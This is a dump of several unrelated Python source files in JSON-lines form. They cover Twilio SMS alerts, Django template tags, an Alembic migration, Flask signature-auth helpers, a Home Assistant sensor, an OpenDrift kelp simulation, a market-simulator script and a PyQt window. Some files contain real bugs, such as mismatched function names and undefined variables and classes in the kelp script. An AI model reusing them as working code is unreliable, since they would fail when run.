os.environ['AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\n\ndef sms_volunteer_request(message, phone_nums):\n \"\"\"Connects organizations on our app to the Twilio functionality.\n\n Org message is passed in (request is created by info that orgs supply\n on webpage, and is put together as a string before this function is called.)\n Phone numbers of interested volunteers are passed in as a list from\n the database.\n \"\"\"\n\n # can add media url below body if needed\n # media_url=\"https://climacons.herokuapp.com/clear.png\"\n\n for num in phone_nums:\n call = client.messages.create(\n to=num,\n from_='+15109441564',\n body=message,\n )\n\n print(call.sid)\n\n\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_ahoy_reply():\n \"\"\"Respond to incoming messages with a friendly SMS.\"\"\"\n # Start our response\n resp = MessagingResponse()\n\n # Add a message\n resp.message(\"Ahoy! Thanks so much for your message.\")\n\n return str(resp)\n\n\n\n\n\n# sample data to call functions\nmessage = 'Hackbright needs 30 volunteers today from 2pm to 7pm. Can you make it?'\nnumbers = os.environ['numbers_list']\n\n# functions\nsend_sms_volunteer_request(message, numbers)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"twilio_functions.py","file_name":"twilio_functions.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"618418937","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom django import template\nfrom blog.models import Category, Post, Tag\nimport math\n\nregister = template.Library()\nNAME_LEN_SIDEBAR = 30\n\n\n@register.inclusion_tag('blog/show_current_categories.html')\ndef show_current_categories(is_detail=False, post=None):\n if is_detail:\n categories = post.category\n else:\n categories = Category.objects.all()\n pre_half = categories[:math.ceil(categories.count() / 2)]\n lst_half = categories[math.ceil(categories.count() / 2):]\n return {\n 'categories': categories,\n 'pre_half': pre_half,\n 'lst_half': lst_half,\n 'is_detail': is_detail\n }\n\n\n@register.inclusion_tag('blog/show_current_tags.html')\ndef show_current_tags(is_detail=False, post=None):\n if is_detail:\n tags = post.tags.all()\n else:\n tags = Tag.objects.all()\n pre_half = tags[:math.ceil(tags.count() / 2)]\n lst_half = tags[math.ceil(tags.count() / 2):]\n return {\n 'tags': tags,\n 'pre_half': pre_half,\n 'lst_half': lst_half,\n }\n\n\n@register.inclusion_tag('blog/most_viewed_posts.html')\ndef most_viewed_posts():\n posts = Post.objects.filter(is_publish=True).order_by('-views')[:5]\n for p in posts:\n if len(p.title) > NAME_LEN_SIDEBAR:\n p.sidebar_name = p.title[:NAME_LEN_SIDEBAR] + '...'\n else:\n p.sidebar_name = p.title[:NAME_LEN_SIDEBAR]\n return {'most_viewed_posts': posts}\n\n\n@register.inclusion_tag('blog/recent_posts.html')\ndef recent_posts():\n posts = Post.objects.filter(is_publish=True).order_by('-created_time')[:5]\n for p in posts:\n if len(p.title) > NAME_LEN_SIDEBAR:\n p.sidebar_name = p.title[:NAME_LEN_SIDEBAR] + '...'\n else:\n p.sidebar_name = p.title[:NAME_LEN_SIDEBAR]\n return {'recent_posts': posts}\n","sub_path":"jase_im/blog/templatetags/blog_template_tags.py","file_name":"blog_template_tags.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609532063","text":"\"\"\"empty message\n\nRevision ID: e0a00045f6c7\nRevises: a27eeb3b21e0\nCreate Date: 2019-07-19 09:32:14.129277\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e0a00045f6c7'\ndown_revision = 'a27eeb3b21e0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(), nullable=True),\n sa.Column('email', sa.String(), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('set',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('exercise', sa.String(length=128), nullable=True),\n sa.Column('pounds', sa.Integer(), nullable=True),\n sa.Column('reps', sa.Integer(), nullable=True),\n sa.Column('rpe', sa.Integer(), nullable=True),\n sa.Column('notes', sa.String(length=140), nullable=True),\n sa.Column('bodyweight', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_set_timestamp'), 'set', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_set_timestamp'), table_name='set')\n op.drop_table('set')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"backend/migrations/versions/e0a00045f6c7_.py","file_name":"e0a00045f6c7_.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547960244","text":"import binascii\nfrom functools import wraps\nimport json\nfrom flask import request, jsonify\nfrom api import settings\nimport base64\nfrom signature import (\n recover_public_address,\n ValidationError as SignatureValidationError\n)\n\n\ndef is_json_dict(data):\n try:\n json_data = json.loads(data)\n except ValueError:\n return False\n if not isinstance(json_data, dict):\n return False\n return True\n\n\ndef validate_json(f):\n @wraps(f)\n def wrapper(*args, **kw):\n if not is_json_dict(request.data):\n return jsonify({\"error\": 'payload must be a valid json'}), 400\n return f(*args, **kw)\n return wrapper\n\n\ndef restrict_by_ip(f):\n @wraps(f)\n def wrapper(*args, **kw):\n if settings.RESTRICT_BY_IP_ENABLED:\n if request.remote_addr not in settings.ALLOWED_IP_ADDRESSES:\n return jsonify(error='resource is forbidden'), 403\n\n return f(*args, **kw)\n\n return wrapper\n\n\ndef recover_identity(f):\n @wraps(f)\n def wrapper(*args, **kw):\n try:\n caller_identity = decode_authorization_header(request.headers)\n except ValueError as err:\n return jsonify(error=str(err)), 401\n\n kw['caller_identity'] = caller_identity\n return f(*args, **kw)\n\n return wrapper\n\n\ndef decode_authorization_header(headers):\n # Authorization request header format:\n # Authorization: Signature \n authorization = headers.get('Authorization')\n if not authorization:\n raise ValueError('missing Authorization in request header')\n\n authorization_parts = authorization.split(' ')\n if len(authorization_parts) != 2:\n raise ValueError('invalid Authorization header value provided, correct'\n ' format: Signature ')\n\n authentication_type, signature_base64_encoded = authorization_parts\n\n if authentication_type != 'Signature':\n raise ValueError('authentication type have to be Signature')\n\n if signature_base64_encoded == '':\n raise ValueError('signature was not provided')\n\n try:\n signature_bytes = base64.b64decode(signature_base64_encoded)\n except binascii.Error as err:\n raise ValueError('signature must be base64 encoded: {0}'.format(err))\n\n try:\n return recover_public_address(\n request.data,\n signature_bytes,\n ).lower()\n except SignatureValidationError as err:\n raise ValueError('invalid signature format: {0}'.format(err))\n","sub_path":"request_helpers.py","file_name":"request_helpers.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162525841","text":"\"\"\"Support for iss sensor.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nfrom homeassistant.components.sensor import SensorEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import ATTR_LATITUDE, ATTR_LONGITUDE, CONF_SHOW_ON_MAP\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom . import IssData\nfrom .const import DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the sensor platform.\"\"\"\n coordinator: DataUpdateCoordinator[IssData] = hass.data[DOMAIN]\n\n name = entry.title\n show_on_map = entry.options.get(CONF_SHOW_ON_MAP, False)\n\n async_add_entities([IssSensor(coordinator, name, show_on_map)])\n\n\nclass IssSensor(CoordinatorEntity[DataUpdateCoordinator[IssData]], SensorEntity):\n \"\"\"Implementation of the ISS sensor.\"\"\"\n\n def __init__(\n self, coordinator: DataUpdateCoordinator[IssData], name: str, show: bool\n ) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n super().__init__(coordinator)\n self._state = None\n self._attr_name = name\n self._show_on_map = show\n\n @property\n def native_value(self) -> int:\n \"\"\"Return number of people in space.\"\"\"\n return self.coordinator.data.number_of_people_in_space\n\n @property\n def extra_state_attributes(self) -> dict[str, Any]:\n \"\"\"Return the state attributes.\"\"\"\n attrs = {}\n if self._show_on_map:\n attrs[ATTR_LONGITUDE] = self.coordinator.data.current_location.get(\n \"longitude\"\n )\n attrs[ATTR_LATITUDE] = self.coordinator.data.current_location.get(\n \"latitude\"\n )\n else:\n attrs[\"long\"] = self.coordinator.data.current_location.get(\"longitude\")\n attrs[\"lat\"] = self.coordinator.data.current_location.get(\"latitude\")\n\n return attrs\n","sub_path":"homeassistant/components/iss/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"7653793","text":"#!/usr/bin/env python\n\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport time\n\nfrom opendrift.readers import reader_basemap_landmask\nfrom opendrift.readers import reader_ROMS_native\n#from kelp.kelpClass import PelagicPlanktonDrift\nfrom opendrift.models.plastdrift import PlastDrift\nimport os\nfrom netCDF4 import Dataset, datetime, date2num, num2date\nimport random\nimport math\nimport glob\nfrom random import randint\n\ntry:\n from osgeo import gdal, osr, ogr\nexcept Exception as e:\n print(e)\n raise ValueError('OGR library is needed to read shapefiles.')\n\n\ndef commonKelpProperties():\n # Thallus = 0\n # New blade / lamina = 1\n # Stipe = 2\n # Fragment = 3\n # feces = 4\n\n #weights = [0.373, 0.7122, 0.4684, 0.03749, 5.908e-6]\n #areas = [0.189097, 0.1323, 0.000452, 0.0007549, 4.39e-6]\n #diameters = [0.4887, 0.410, 0.0240, 0.09807, 0.002365]\n #lengths = [0.002, 0.002, 0.984, 0.0031, 0.002365]\n #volumes = (np.asarray(areas) * np.asarray(lengths)).tolist()\n #densities = [1446.6, 1541.0, 1882, 234.99, 1035]\n #SDdensities = [401, 668.71, 403, 51.09, 48.98]\n\n sinkspeed = [0.165, 0.074, 0.181, 0.036, 0.01]\n sinkspeedsstd = [0.0, 0.0, 0.038, 0.020, 0.0]\n return sinkspeed, sinkspeedsstd #weights, densities, SDdensities, areas, lengths, volumes, diameters\n\n\ndef commonDateProperties(experiment):\n if experiment == 1:\n startTime = datetime(2016, 5, 1, 0, 0, 0)\n endTime = datetime(2016, 8, 1, 0, 0, 0) #8\n if experiment == 2:\n startTime = datetime(2016, 3, 1, 0, 0, 0)\n endTime = datetime(2016, 5, 15, 0, 0, 0) # 5\n if experiment == 3:\n startTime = datetime(2015, 11, 20, 0, 0, 0)\n endTime = datetime(2016, 4, 1, 0, 0, 0) # 4\n if experiment == 4:\n startTime = datetime(2016, 5, 1, 0, 0, 0)\n endTime = datetime(2016, 8, 1, 0, 0, 0) #8\n if experiment == 5:\n startTime = datetime(2015, 8, 1, 0, 0, 0)\n endTime = datetime(2016, 8, 1, 0, 0, 0)\n\n return startTime, endTime\n\n\ndef kelpProperties(num, kelpTypes):\n # Get the options of weights and densities\n sinkspeeds, sinkspeedsstd = commonKelpProperties()\n\n # Loop over num release dates and randomly select type from provided kelpTypes list\n # Kelptypes list contents indicate which of the indices/options you have selected in commonKelpProperties\n # If onlye old blades: kelpTypes=[0]\n\n kelpWeights = []\n kelpDensities = []\n kelpAreas = []\n kelpLengths = []\n kelpVolumes = []\n kelpDiameters = []\n kelpType = []\n\n for i in range(len(num)):\n ind = random.choice(kelpTypes)\n kelpWeights.append(weights[ind])\n kelpType.append(ind)\n # Calculate a random density based on the mean and std values\n\n # Divide STD by 3 to get teh sigma value require dby the function\n stds = np.random.normal(densities[ind], SDdensities[ind] / 3.0)\n\n kelpDensities.append(stds)\n kelpAreas.append(areas[ind])\n kelpVolumes.append(volumes[ind])\n kelpDiameters.append(diameters[ind])\n kelpLengths.append(lengths[ind])\n\n return kelpWeights, kelpDensities, kelpAreas, kelpVolumes, kelpDiameters, kelpLengths, kelpType\n\n\ndef createOutputFilenames(experiment, polygonIndex, shapefile, verticalBehavior):\n startTime, endTime = commonDateProperties(experiment)\n startDate = ''\n if startTime.day < 10:\n startDate += '0%s' % (startTime.day)\n else:\n startDate += '%s' % (startTime.day)\n\n if startTime.month < 10:\n startDate += '0%s' % (startTime.month)\n else:\n startDate += '%s' % (startTime.month)\n\n startDate += '%s' % (startTime.year)\n\n endDate = ''\n if endTime.day < 10:\n endDate += '0%s' % (endTime.day)\n else:\n endDate += '%s' % (endTime.day)\n\n if endTime.month < 10:\n endDate += '0%s' % (endTime.month)\n else:\n endDate += '%s' % (endTime.month)\n\n endDate += '%s' % (endTime.year)\n\n # Special file naming for KINO. Each layer has name 'species.shp' and we want teh species name only.\n head, tail = os.path.split(shapefile)\n\n specie = \"Kelp\"\n outputFilename = 'results/%s_polygon_%s_experiment_%s_%s_to_%s.nc' % (\n specie, polygonIndex, experiment, startDate, endDate)\n animationFilename = 'figures/%s_polygon_%s_experiment_%s_%s_to_%s.mp4' % (\n specie, polygonIndex, experiment, startDate, endDate)\n plotFilename = 'figures/%s_polygon_%s_experiment_%s_%s_to_%s.png' % (\n specie, polygonIndex, experiment, startDate, endDate)\n\n if not os.path.exists('figures'):\n os.makedirs('figures')\n if not os.path.exists('results'):\n os.makedirs('results')\n return outputFilename, animationFilename, plotFilename\n\n\ndef createAndRunSimulation(use_svim, experiment, mapResolution, interMethod, lowDepth, highDepth, layer, polygonIndex,\n shapefile, outputFilename, animationFilename, plotFilename, kinoDirectory, pattern_kino,\n svimfiles2015, svimfiles2016, verticalBehavior, allNum,\n allReleaseTimes, allKelpWeights, allKelpDensities, allKelpAreas, allKelpVolumes,\n allKelpDiameters, allKelpLengths, allKelpTypes):\n # Setup a new simulation\n o = PelagicPlanktonDrift(loglevel=1) # Set loglevel to 0 for debug information\n startTime, endTime = commonDateProperties(experiment)\n\n allKelpWeights_flat = [item for sublist in allKelpWeights for item in sublist]\n allKelpDensities_flat = [item for sublist in allKelpDensities for item in sublist]\n allReleaseTimes_flat = [item for sublist in allReleaseTimes for item in sublist]\n allKelpAreas_flat = [item for sublist in allKelpAreas for item in sublist]\n allKelpVolumes_flat = [item for sublist in allKelpVolumes for item in sublist]\n allKelpDiameters_flat = [item for sublist in allKelpDiameters for item in sublist]\n allKelpLengths_flat = [item for sublist in allKelpLengths for item in sublist]\n allKelpTypes_flat = [item for sublist in allKelpTypes for item in sublist]\n\n allNum_flat = [item for sublist in allNum for item in sublist]\n\n print(\"=> Simulation will release a total of %s particles\\n\" % (np.sum(allNum_flat)))\n\n # Randomly distribute the particles at depths varying between lowDepth and highDepth\n depths = [randint(lowDepth, highDepth) for i in range(len(allNum_flat))]\n\n #######################\n # Preparing readers\n #######################\n reader_basemap = reader_basemap_landmask.Reader(\n llcrnrlon=15, llcrnrlat=68,\n urcrnrlon=23, urcrnrlat=74,\n resolution=mapResolution, projection='merc')\n o.add_reader([reader_basemap]) # Do not include basemap when stranding is deactivated\n\n reader_kino = reader_ROMS_native.Reader([s for s in pattern_kino])\n reader_kino.interpolation = interMethod\n\n if use_svim:\n reader_svim2015 = reader_ROMS_native.Reader(svimfiles2015)\n reader_svim2015.interpolation = interMethod\n reader_svim2016 = reader_ROMS_native.Reader(svimfiles2016)\n reader_svim2016.interpolation = interMethod\n\n o.add_reader([reader_kino, reader_svim2016, reader_svim2015])\n else:\n o.add_reader([reader_kino])\n\n #######################\n # Adjusting configuration\n #######################\n o.set_config('processes:turbulentmixing', True)\n o.set_config('turbulentmixing:diffusivitymodel', 'windspeed_Sundby1983')\n o.set_config('turbulentmixing:timestep', 1) # secondsS\n o.set_config('turbulentmixing:verticalresolution', 1) # default is 1 meter, but since we have longer timestep we justify it\n o.set_config('processes:verticaladvection', True)\n o.set_config('turbulentmixing:TSprofiles', False)\n o.set_config('turbulentmixing:max_iterations', 100)\n\n o.set_config('drift:scheme', 'euler')\n o.set_config('general:coastline_action', 'previous') # Prevent stranding, jump back to previous position\n print(o)\n\n # depths=[randint(lowDepth,highDepth) for i in xrange(len(allKelpWeights))]\n allNum_flat = list(map(int, allNum_flat))\n for i, nums in enumerate(allNum_flat):\n\n if nums <= 0:\n continue\n print(\"Running i=%s num=%s and polygon=%s\" % (i, nums, polygonIndex))\n\n o.seed_from_shapefile(shapefile, allNum_flat[i], featurenum=[polygonIndex],\n z=\"seafloor+1\", # depths[i],\n weight=allKelpWeights_flat[i],\n density=allKelpDensities_flat[i],\n area=allKelpAreas_flat[i],\n volume=allKelpVolumes_flat[i],\n diameter=allKelpDiameters_flat[i],\n length=allKelpLengths_flat[i],\n time=allReleaseTimes_flat[i],\n plantpart=allKelpTypes_flat[i])\n\n # reader_basemap.plot()\n\n #########################\n # Run the model\n #########################\n # o.plot()\n\n o.run(end_time=endTime, time_step=timedelta(hours=2),\n outfile=outputFilename)\n # export_variables=['lon', 'lat', 'z','temp','length','weight','survival'])\n # print o\n\n\ndef setupSeed(seedCount, intervalHours, startTime, endTime, startReleaseTime, endReleaseTime, releaseParticles):\n ##################################################\n # Create seed variation as function of day\n # Called multiple times from setupSeedsForExperiment\n ##################################################\n\n difference = endTime - startTime\n hoursOfSimulation = divmod(difference.total_seconds(), 3600)\n\n difference = endReleaseTime - startReleaseTime\n hoursOfRelease = divmod(difference.total_seconds(), 3600)\n\n timeStepsSimulation = int(int(hoursOfSimulation[0]) / 3)\n\n # print \"=>Release: Simulated Release will run for %s simulation hours\\n initiated on %s and ending on %s\"%(timeStepsSimulation,startReleaseTime,endReleaseTime)\n\n interval = timedelta(hours=intervalHours)\n hoursPerRelease = divmod(interval.total_seconds(), 3600) # hours per Release event\n timeStepsRelease = int(int(hoursOfRelease[0]) / int(hoursPerRelease[0])) # number of Release timesteps\n ReleaseTimes = [startReleaseTime + interval * n for n in range(timeStepsRelease)] # times of Release\n\n # num=np.random.normal(releaseParticles,int(releaseParticles/2)-1, size=len(ReleaseTimes)).astype(int)\n num = [releaseParticles for n in range(timeStepsRelease)]\n # num=np.sort(num) #sort particles in increasing order\n\n print(\"=> Seed episode: %s => Release of %s kelp particles\" % (seedCount, np.sum(num)))\n\n return num, ReleaseTimes\n\n\ndef setupSeedsForExperiment(experiment, releaseParticles):\n print(\"\\nSeed setup started --------\")\n seedCount = 1\n allNum = []\n allReleaseTimes = []\n allKelpProps = []\n allKelpWeights = []\n allKelpDensities = []\n allKelpAreas = []\n allKelpVolumes = []\n allKelpDiameters = []\n allKelpLengths = []\n allKelpTypes = []\n\n # Batch one : Old lamina (77%) released evenly 6 times a day between 122 and 135. \n startTime, endTime = commonDateProperties(experiment)\n startReleaseTime = startTime\n endReleaseTime = endTime\n\n intervalHours = 6\n print(\"=> Release: daily: %s to %s\" % (startReleaseTime, endReleaseTime))\n\n num, ReleaseTimes = setupSeed(seedCount, intervalHours, startTime, endTime, startReleaseTime, endReleaseTime,\n releaseParticles)\n allNum.append(num)\n allReleaseTimes.append(ReleaseTimes)\n seedCount += 1\n\n # Release only old blades\n kelpTypes = [0]\n kelpWeights, kelpDensities, kelpAreas, kelpVolumes, kelpDiameters, kelpLengths, kelpTypes = kelpProperties(num,\n kelpTypes)\n allKelpDensities.append(kelpDensities)\n allKelpWeights.append(kelpWeights)\n allKelpAreas.append(kelpAreas)\n allKelpVolumes.append(kelpVolumes)\n allKelpDiameters.append(kelpDiameters)\n allKelpLengths.append(kelpLengths)\n allKelpTypes.append(kelpTypes)\n # Batch two : New lamina (23%) released evenly 6 times a day once a week \n # Find the number of weeks between start and stop\n num_of_weeks = int(math.ceil((endTime - startTime).days / 7.0))\n\n # Release once per week\n for week in range(int(num_of_weeks) - 1):\n dayN = week * 7\n startReleaseTime = startTime + timedelta(days=dayN)\n endReleaseTime = startTime + timedelta(days=dayN + 1)\n print(\"=> Release: weekly: %s to %s\" % (startReleaseTime, endReleaseTime))\n intervalHours = 6\n\n num, ReleaseTimes = setupSeed(seedCount, intervalHours, startTime, endTime, startReleaseTime, endReleaseTime,\n releaseParticles)\n allNum.append(num)\n allReleaseTimes.append(ReleaseTimes)\n\n seedCount += 1\n # Define the properties of kelp to be released in batch 2\n # new blades, stipes, and fragments (in equal counts - check with Eli)\n kelpTypes = [1, 2, 3, 4]\n kelpWeights, kelpDensities, kelpAreas, kelpVolumes, kelpDiameters, kelpLengths, kelpTypes = kelpProperties(num,\n kelpTypes)\n allKelpDensities.append(kelpDensities)\n allKelpWeights.append(kelpWeights)\n allKelpAreas.append(kelpAreas)\n allKelpVolumes.append(kelpVolumes)\n allKelpDiameters.append(kelpDiameters)\n allKelpLengths.append(kelpLengths)\n allKelpTypes.append(kelpTypes)\n\n print(\"Seed setup done --------\\n\")\n # Return the total number of particles per release date\n return allNum, allReleaseTimes, allKelpWeights, allKelpDensities, allKelpAreas, allKelpVolumes, allKelpDiameters, allKelpLengths, allKelpTypes\n\n\n#########################\n# SETUP FOR KELP PROJECT\n#########################\n\nrunLocally = True\nexperiments = [5]\nreleaseParticles = 5\n\nfor experiment in experiments:\n lowDepth, highDepth = -4, -2 # in negative meters\n verticalBehavior = False\n startTime, endTime = commonDateProperties(experiment)\n\n kinoDirectory = '/imr/vol1/NorFjords5/Malangen-160m_AUG2015-AUG2016/'\n if runLocally:\n kinoDirectory = \"/Volumes/home/CloudStation/NorFjord/\"\n\n #if (startTime.year Using shapefile %s\" % shapefile)\n s = ogr.Open(shapefile)\n\n # Find all kelp polygons in Shapefile\n for layer in s:\n polygons = [x + 1 for x in range(layer.GetFeatureCount() - 1)]\n polygons=[13]\n\n print(('Running for layer with %s features)' % (layer.GetFeatureCount())))\n # Loop over all kelp polygons, releasing kelp and tracking their drift, writing results to file\n for polygonIndex in polygons:\n\n feature = layer.GetFeature(polygonIndex - 1)\n\n print(\"Kelp area %s for polygon %s\" % (feature.GetGeometryRef().GetArea(), polygonIndex))\n geom = feature.GetGeometryRef()\n points = geom.GetGeometryCount()\n ring = geom.GetGeometryRef(0)\n\n if ring.GetPointCount() > 3:\n outputFilename, animationFilename, plotFilename = createOutputFilenames(experiment, polygonIndex,\n shapefile, verticalBehavior)\n\n print(\"Result files will be stored as:\\nnetCDF=> %s\\nmp4=> %s\" % (outputFilename, animationFilename))\n\n print(\"Starting simulations....\")\n createAndRunSimulation(use_svim, experiment, mapResolution, interMethod, lowDepth, highDepth,\n layer, polygonIndex, shapefile,\n outputFilename, animationFilename, plotFilename,\n kinoDirectory, pattern_kino, svimfiles2015, svimfiles2016,\n verticalBehavior, allNum, allReleaseTimes, allKelpWeights,\n allKelpDensities, allKelpAreas, allKelpVolumes, allKelpDiameters, allKelpLengths,\n allKelpTypes)\n","sub_path":"Kelp/kelp_experiment_v1.py","file_name":"kelp_experiment_v1.py","file_ext":"py","file_size_in_byte":17835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"513255448","text":"from market_simulator import MarketSimulator,DataLoader,MarketDAOImpl,AmeritradeAdapter,SMAPreprocessor,SMADAOImpl,HighChartsAdapter\nfrom params_config import config\nimport sys\nsys.dont_write_bytecode=True\n\n\ndef main():\n \n stockSymbols = config['stockSymbols']\n strategyTypes = config['strategyType'] \n\n preprocessors = []\n\n simulator = MarketSimulator()\n\n for i in range(len(strategyTypes)):\n if strategyTypes[i] == 'sma':\n if config['chartingTool'] == 'HighCharts':\n preprocessors.append('SMAPreprocessor(HighChartsAdapter)')\n\n simulator.loadSymbols(stockSymbols)\n simulator.loadStrategyTypes(preprocessors)\n\n\n if config['database'] == 'POSTGRESQL':\n simulator.setMarketDAO('PostgreMarketDAO')\n else:\n print('build_failed')\n\n\n if config['provider'] == 'Ameritrade':\n simulator.setReader('HighChartsAdapter')\n else:\n print('build_failed')\n\n\n simulator.run()\n\n\n\n\n\n\n\n\n \n ","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"202368966","text":"import os\nimport re\nimport traceback\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom core.loadData import loadData, updateCachedData\nfrom core.runSegmentation import runSegmentation\nfrom generated import mainWindow_ui\nfrom gui.configureWindow_TexasTechDixon import ConfigureWindow as ConfigureWindowTexasTechDixon\nfrom gui.configureWindow_WashUDixon import ConfigureWindow as ConfigureWindowWashUDixon\nfrom gui.configureWindow_WashUUnknown import ConfigureWindow as ConfigureWindowWashUUnknown\nfrom util import constants\nfrom util.enums import ScanFormat\nfrom util.fileDialog import FileDialog\n\n\nclass MainWindow(QMainWindow, mainWindow_ui.Ui_MainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n\n self.sourceModel = QStandardItemModel(self.sourceListView)\n self.sourceListView.setModel(self.sourceModel)\n\n # Load the combo box with the data types defined in ScanFormat enumeration\n self.dataTypeComboBox.addItems([str(item) for item in ScanFormat])\n\n self.loadSettings()\n\n def loadSettings(self):\n settings = QSettings(constants.applicationName, constants.organizationName)\n settings.beginGroup('mainWindow')\n\n geometry = settings.value('geometry', QByteArray(), type=QByteArray)\n if not geometry.isEmpty():\n self.restoreGeometry(geometry)\n\n # Fixes QTBUG-46620 issue\n if settings.value('maximized', False, type=bool):\n self.showMaximized()\n self.setGeometry(QApplication.desktop().availableGeometry(self))\n\n self.defaultOpenPath = settings.value('defaultOpenPath', QDir.homePath())\n\n settings.endGroup()\n\n def saveSettings(self):\n settings = QSettings(constants.applicationName, constants.organizationName)\n settings.beginGroup('mainWindow')\n\n settings.setValue('geometry', self.saveGeometry())\n settings.setValue('maximized', self.isMaximized())\n settings.setValue('defaultOpenPath', self.defaultOpenPath)\n\n settings.endGroup()\n\n def selectFormatFromDirectory(self, directory):\n match = re.match(r'^MF03([\\d]*)[-_]((POST)|(PRE))', os.path.basename(directory))\n\n format = (ScanFormat.WashUUnknown if int(match.group(1)) < 12 else ScanFormat.WashUDixon) \\\n if match else ScanFormat.TexasTechDixon\n\n self.dataTypeComboBox.setCurrentIndex(format.value)\n\n @pyqtSlot()\n def on_browseSourceButton_clicked(self):\n directories = FileDialog.getExistingDirectories(self, 'Select source folders of subjects', self.defaultOpenPath)\n\n # Nothing was selected\n if not directories:\n return\n\n # Save the last directory used\n self.defaultOpenPath = os.path.dirname(directories[0])\n\n # Check each of the directories and make sure they are valid\n # Skip adding that row if it isn't valid\n hasError = False\n for directory in directories:\n if not os.path.isdir(directory):\n hasError = True\n continue\n\n self.sourceModel.appendRow(QStandardItem(directory))\n\n # If this is the first set of items added to the list, select the first item\n if self.sourceModel.rowCount() > 0 and not self.sourceListView.currentIndex().isValid():\n self.sourceListView.setCurrentIndex(self.sourceModel.index(0, 0))\n self.sourceListView.setFocus()\n\n # Select the appropriate data format based on directory contents\n # Only do this if this is the first item added, makes it easier for the user not to have to change this\n if self.sourceModel.rowCount() > 0:\n self.selectFormatFromDirectory(directories[0])\n\n # If an error occurred, tell the user that the directory was not added\n if hasError:\n QMessageBox.critical(self, 'Invalid directory',\n 'One of the directories you chose was invalid. It was not added to the list')\n\n @pyqtSlot()\n def on_runButton_clicked(self):\n # If there are no source files, then return\n if self.sourceModel.rowCount() is 0:\n QMessageBox.warning(self, 'No source directories', 'There are no source directories in the list currently.'\n 'Please add some folders before converting.')\n return\n\n # Get the scan format\n format = ScanFormat(self.dataTypeComboBox.currentIndex())\n\n # Loop through each row in the list view\n for i in range(self.sourceModel.rowCount()):\n # Get the data path for the row\n dataPath = self.sourceModel.item(i).text()\n\n print('Beginning segmentation for %s' % dataPath)\n\n # Attempt to load the data from the data path\n try:\n data = loadData(dataPath, format, self.cacheDataCheckbox.isChecked())\n except Exception:\n print('Unable to load data from %s. Skipping...' % dataPath)\n print(traceback.format_exc())\n continue\n\n # Set constant pathDir to be the current data path to allow writing/reading from the current directory\n constants.pathDir = dataPath\n\n # Run segmentation algorithm\n try:\n runSegmentation(data, format)\n pass\n except Exception:\n print('Unable to run segmentation algorithm on %s. Skipping...' % dataPath)\n print(traceback.format_exc())\n continue\n\n print('Segmentation complete!')\n\n @pyqtSlot()\n def on_configureButton_clicked(self):\n selectedIndices = self.sourceListView.selectedIndexes()\n\n if self.sourceModel.rowCount() is 0:\n QMessageBox.warning(self, 'No source directories', 'There are no source directories in the list currently. '\n 'Please add some folders before converting.')\n return\n elif len(selectedIndices) == 0:\n QMessageBox.warning(self, 'No selected source directories', 'There are no source directories selected '\n 'currently. Please select one.')\n return\n elif len(selectedIndices) != 1:\n QMessageBox.warning(self, 'Multiple selected directories', 'There are currently more than one directories '\n 'selected to configure. Please select only one.')\n return\n\n # Get the scan format\n format = ScanFormat(self.dataTypeComboBox.currentIndex())\n\n # Get selected index text\n dataPath = selectedIndices[0].data()\n\n # Attempt 